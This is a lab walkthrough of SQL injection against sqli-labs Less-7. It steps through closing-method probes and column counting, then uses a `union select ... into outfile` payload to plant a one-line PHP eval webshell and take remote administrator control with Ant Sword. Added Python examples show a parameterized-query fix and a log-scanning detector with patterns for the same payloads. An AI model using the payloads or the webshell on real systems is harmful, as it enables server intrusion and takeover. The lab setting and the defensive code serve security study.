# Main knowledge points
1. `show variables like '%secure%';` is used to check whether MySQL is allowed to read and write files (the `secure_file_priv` setting). If this value is NULL, the file read and write functions cannot be used.
2. The database's FILE privilege determines whether the database user is allowed to read and write files in the operating system, within the permissions the database process already has there.
3. Conditions for using `into outfile`: you must know the full path of a folder on the server where files can be written.
# File upload command (one-sentence Trojan horse)
`<?php @eval($_POST['x'])?>` is a one-sentence Trojan horse (a one-line PHP webshell): it executes whatever PHP code arrives in the POST parameter `x`.
# File upload usage
The goal is to get a one-sentence Trojan horse onto the server.
1. If the file lands in the website's directory, it can be reached directly by its URL.
2. If the target website has a file inclusion vulnerability and the database has permission to write files, write the one-sentence Trojan horse to a path the database can reach and use the file inclusion to include it. The file does not have to be under the web root; as long as it is somewhere on the target server, the inclusion triggers it.
# File upload command (into outfile)
`?id=-1')) union select 1,2,"<?php @eval($_POST['x']);?>" into outfile "D:\\phpStudy\\WWW\\haha.php" --+`
- `"<?php @eval($_POST['x']);?>"`: the content to write, the one-sentence Trojan horse; `x` is the password used later to connect with Ant Sword
- `into outfile`: writes (exports) the selected row to a file
- `"D:\\phpStudy\\WWW\\"`: the directory to write into (the backslashes are doubled because a single backslash is an escape character inside a MySQL string)
- `haha.php`: the name of the generated file
Note: the PHP code is wrapped in double quotes, so the parameter `x` inside it must use single quotes rather than double quotes; otherwise the quoting is broken and the statement is not parsed correctly.
# Case demo
sqli-labs-master/Less-7/
1. Determine the closing method
First pass in a parameter.
The page shows: you are in... use outfile
Numeric test
url: ?id=1 and 1=1
The page shows "you are in" normally
url: ?id=1 and 1=2
The page still displays normally, without an error
If there is no protection in place, this basically means the parameter is treated as a string (character type)
Because it is a character type, the background statement is something like
select * from database.tables where id='1 and 1=2'
The injected text is treated as part of the string, so the condition has no effect.
First test
Determine whether the parameter is closed with a single quote '
url: ?id=1'
Throwing in a ' makes the page report an error, but no error message content is echoed
url: ?id=1' --+
Use --+ to comment out the rest of the statement. If the page shows "you are in", that proves the parameter is closed with '.
But judging from what the page displays, it is not closed with a plain single quote '.
Second test (determine whether it is closed with a double quote ")
url: ?id=1" --+
The page shows you are in...
url: ?id=1" and 1=2 --+
Confirm again with and 1=2.
If the page showed an error here, the parameter would be closed with a double quote ",
because, guessing at the SQL statement, and 1=2 would not hold.
But the page still echoes "you are in" normally. Why?
Because the parameter may be wrapped in single quotes ' ', so the " you typed is simply part of the string
For example, if the original background SQL statement is
select * from database.table where id='1'
then after your input it becomes
select * from database.tables where id='1" --+'
Since everything is inside the single quotes, the " and the --+ you entered are just characters in the string value (it is also possible that the --+ is filtered out by the system or the developer's code), so the statement behaves like the original select * from database.table where id='1'
That statement is normal, so the page is echoed normally
Therefore we have to use and 1=1 and and 1=2 again to judge
Third test (single quote plus one parenthesis ')
url: ?id=1') --+
The page still reports an error
Fourth test (double quote plus one parenthesis ")
url: ?id=1") --+
Shows you are in
url: ?id=1") and 1=2 --+
Confirm again with and 1=2
The page still displays "you are in" normally, so ") is not the closing method either
Fifth test (single quote plus two parentheses ')))
url: ?id=1')) --+
The page shows "you are in" normally
url: ?id=1')) and 1=2 --+
Judge again with and 1=2
The page errors, so the closing method is determined to be '))
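To see why the `'))` probes above change the page and what stops them, here is an added example (not from the original post) that rebuilds the lookup in Python with an in-memory SQLite table standing in for the lab's MySQL database: the concatenated `(('...'))` query beside a parameterized one, fed the same already-URL-decoded inputs (`--+` arrives as `-- `).

```python
import sqlite3

# Constructed stand-in for the lab database (assumption: SQLite in memory instead of
# the lab's MySQL, and a two-row table; neither comes from the original post).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", [(1, "Dumb"), (2, "Angelina")])
    return conn

def vulnerable_lookup(conn, user_id):
    """Concatenates the raw parameter into a (('...')) wrapper, the closing method the
    walkthrough infers for Less-7. Anything the user typed is parsed as SQL.
    Returns the matching rows, or None where the lab would show an error page."""
    sql = "SELECT id, username FROM users WHERE id=(('" + user_id + "'))"
    try:
        return conn.execute(sql).fetchall()
    except sqlite3.Error:
        return None

def safe_lookup(conn, user_id):
    """Same query with a bound parameter: the driver sends the value separately, so
    quotes, parentheses and comment markers inside it never reach the SQL parser."""
    return conn.execute(
        "SELECT id, username FROM users WHERE id=((?))", (user_id,)
    ).fetchall()

def compare(conn, user_id):
    """Side-by-side result for one input, already URL-decoded (the page's --+ is '-- ')."""
    return {"vulnerable": vulnerable_lookup(conn, user_id), "safe": safe_lookup(conn, user_id)}

if __name__ == "__main__":
    db = make_db()
    for probe in ["1", "1'", "1')) and 1=1 -- ", "1')) and 1=2 -- "]:
        print(repr(probe), compare(db, probe))
```

With concatenation the `and 1=1` / `and 1=2` pair flips the result exactly as the page describes, while the parameterized version returns nothing for every probe because the whole input is compared as a literal value.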
2. Find the number of fields (order by or group by)
url: ?id=1')) group by 4 --+
The page returns an error
url: ?id=1')) group by 3 --+
The page displays "you are in" normally, without an error
Conclusion: there are 3 fields
4. Write the one-sentence Trojan horse
url:
?id=-1')) union select 1,2,"<?php @eval($_POST['x']);?>" into outfile "D:\\phpStudy\\WWW\\haha.php" --+
Note: the content can be written in any of the three fields; I put it in field 3, but field 2 or 1 would work as well
After execution the page reports an error, but that does not matter; if the statement is correct, the write succeeds.
At this point a haha.php file has been generated in that directory
Check its content: the one-sentence code has been written into it successfully
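For the defending side, here is an added example (not part of the original post) that scans constructed Apache-style access-log lines for the indicators this walkthrough leaves behind: the `'))` closing probe, `and 1=2`, `group by N`, `union select` and `into outfile`, matched on the URL-decoded query string.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed Apache-style access log (not from the original post): a normal request,
# then the closing-method probe, the group by probe and the into outfile write shown above.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0800] "GET /Less-7/?id=1 HTTP/1.1" 200 721',
    '10.0.0.5 - - [01/Jan/2024:10:00:02 +0800] "GET /Less-7/?id=1%27 HTTP/1.1" 200 650',
    '10.0.0.5 - - [01/Jan/2024:10:00:03 +0800] "GET /Less-7/?id=1%27))%20and%201=2%20--+ HTTP/1.1" 200 650',
    '10.0.0.5 - - [01/Jan/2024:10:00:04 +0800] "GET /Less-7/?id=1%27))%20group%20by%204%20--+ HTTP/1.1" 200 650',
    '10.0.0.5 - - [01/Jan/2024:10:00:05 +0800] "GET /Less-7/?id=-1%27))%20union%20select%201,2,'
    '%22%3C?php%20@eval($_POST[%27x%27]);?%3E%22%20into%20outfile%20'
    '%22D:%5C%5CphpStudy%5C%5CWWW%5C%5Chaha.php%22%20--+ HTTP/1.1" 200 650',
]

# Each indicator is one step of the walkthrough; matching is done on the URL-decoded
# query string so %27 and --+ are seen as the attacker typed them.
INDICATORS = [
    ("into outfile", re.compile(r"\binto\s+outfile\b", re.I)),
    ("union select", re.compile(r"\bunion\s+select\b", re.I)),
    ("php tag", re.compile(r"<\?php", re.I)),
    ("boolean probe", re.compile(r"\band\s+1\s*=\s*[12]\b", re.I)),
    ("column count probe", re.compile(r"\b(?:group|order)\s+by\s+\d+", re.I)),
    ("closing probe", re.compile(r"['\"]\)+")),
    ("comment terminator", re.compile(r"--(?:\s|$)")),
]

REQUEST_LINE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def scan_request(target):
    """Return the indicator names present in one request target (path?query)."""
    decoded = unquote_plus(urlsplit(target).query)
    return [name for name, pattern in INDICATORS if pattern.search(decoded)]

def scan_log(lines):
    """Return (line_number, indicators) for every log line carrying at least one indicator."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_LINE.search(line)
        if match:
            found = scan_request(match.group(1))
            if found:
                hits.append((number, found))
    return hits

if __name__ == "__main__":
    for number, found in scan_log(SAMPLE_LOG):
        print(f"line {number}: {', '.join(found)}")
```

A lone `1'` probe (log line 2) is deliberately not flagged, since a single quote in a parameter is common in normal traffic; the database error that request produced is the better signal for that step.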
5. Connect with Ant Sword
Open the Ant Sword .exe
Right-click the blank area -> Add Data
URL: the address ending in haha.php, the file generated by writing the one-sentence code earlier
Connection password: x, the parameter we used in the one-sentence Trojan horse
Click Test Connection -> shows Success
Click Add
Connection succeeded
The target server is now effectively under our remote control
Because phpStudy (Xiaopi) was run with administrator privileges,
use whoami to check whether you have administrator privileges. Having administrator privileges means this computer is essentially operated by us, because administrator is the highest privilege
If these details are not enough, see https://mp.csdn.net/mp_blog/creation/editor/129723083